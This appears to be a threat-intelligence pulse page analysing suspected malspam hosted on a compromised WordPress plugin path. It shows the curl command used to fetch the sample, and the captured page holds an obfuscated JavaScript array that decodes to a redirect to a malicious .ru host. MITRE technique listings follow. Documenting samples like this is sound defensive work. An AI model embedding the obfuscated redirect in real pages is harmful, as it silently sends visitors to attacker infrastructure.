Gmail Phishing
概要
Possible malspam, calls script from healingprivatemall[.]ru; no particular evasion apparent beyond useragent;
curl -A"Mozilla/5.0 (Windows NT 5.2; rv:2.0.1) Gecko/20100101 Firefox/4.0.1" http://thestuartsofvirginia[.]com/wp-content/plugins/weissmuller.php
<script type="text/javascript">
function equale() { equala=19; equalb=[138,124,129,119,130,138,65,135,130,131,65,127,130,118,116,135,124,130,129,65,123,133,120,121,80,58,123,135,135,131,77,66,66,123,120,116,127,124,129,122,131,133,124,137,116,135,120,128,116,127,127,65,133,136,58,78]; equalc=""; for(equald=0;equald<equalb.length;equald++) { equalc+=String.fromCharCode(equalb[equald]-equala); } return equalc; } setTimeout(equale(),1253);
</script>
</body>
Request Response
GET /favicon.ico HTTP/1.1
Host: thestuartsofvirginia.com
United States
AS46606 Unified Layer 192.254.235.37
HTTP/1.0 200 OK
Content-Type: image/x-icon
GET / HTTP/1.1
Host: healingprivatemall[.]ru
Created: 2026-02-23
Indicators
Indicatorsは見つかっていない。
類似Pulses
このPulseに関連する脅威アクター (事実ベース)
Score: 4.57
Matched TTPs:
- T1059.007 - JavaScript
- T1124 - System Time Discovery
MITREへのリンク →
Score: 4.57
Matched TTPs:
- T1059.007 - JavaScript
- T1124 - System Time Discovery
MITREへのリンク →
Score: 6.51
Matched TTPs:
- T1059.007 - JavaScript
- T1543.001 - Launch Agent
MITREへのリンク →
Score: 4.57
Matched TTPs:
- T1059.007 - JavaScript
- T1124 - System Time Discovery
MITREへのリンク →
Score: 4.57
Matched TTPs:
- T1059.007 - JavaScript
- T1124 - System Time Discovery
MITREへのリンク →
Score: 9.54
Matched TTPs:
- T1059.007 - JavaScript
- T1036.007 - Double File Extension
- T1598 - Phishing for Information
MITREへのリンク →
Score: 6.11
Matched TTPs:
- T1059.007 - JavaScript
- T1036.007 - Double File Extension
MITREへのリンク →
Score: 6.88
Matched TTPs:
- T1552.004 - Private Keys
- T1598 - Phishing for Information
MITREへのリンク →
Score: 6.03
Matched TTPs:
- T1552.004 - Private Keys
- T1124 - System Time Discovery
MITREへのリンク →
Score: 7.13
Matched TTPs:
- T1574.013 - KernelCallbackTable
- T1124 - System Time Discovery
MITREへのリンク →
Score: 4.54
Matched TTPs:
- T1090.004 - Domain Fronting
MITREへのリンク →
Score: 6.03
Matched TTPs:
- T1598 - Phishing for Information
- T1124 - System Time Discovery
MITREへのリンク →
Score: 7.57
Matched TTPs:
- T1598 - Phishing for Information
- T1550.001 - Application Access Token
MITREへのリンク →
Score: 3.44
Matched TTPs:
- T1598 - Phishing for Information
MITREへのリンク →
Score: 4.13
Matched TTPs:
- T1564.005 - Hidden File System
MITREへのリンク →
Score: 4.13
Matched TTPs:
- T1564.005 - Hidden File System
MITREへのリンク →
Score: 4.13
Matched TTPs:
- T1550.001 - Application Access Token
MITREへのリンク →
このPulseに関連する脅威アクター (推論ベース)
Score: 0.76
Matched TTPs:
- T1598 - Phishing for Information
- T1036.007 - Double File Extension
- T1059.007 - JavaScript
MITREへのリンク →
Score: 0.64
Matched TTPs:
- T1550.001 - Application Access Token
- T1598 - Phishing for Information
MITREへのリンク →
Score: 0.58
Matched TTPs:
- T1574.013 - KernelCallbackTable
- T1124 - System Time Discovery
MITREへのリンク →
Score: 0.56
Matched TTPs:
- T1552.004 - Private Keys
- T1598 - Phishing for Information
MITREへのリンク →
Related CVEs
このPulseに見つかったCVEはありません。
Pulse – 脅威アクター グラフ
← Pulse一覧に戻る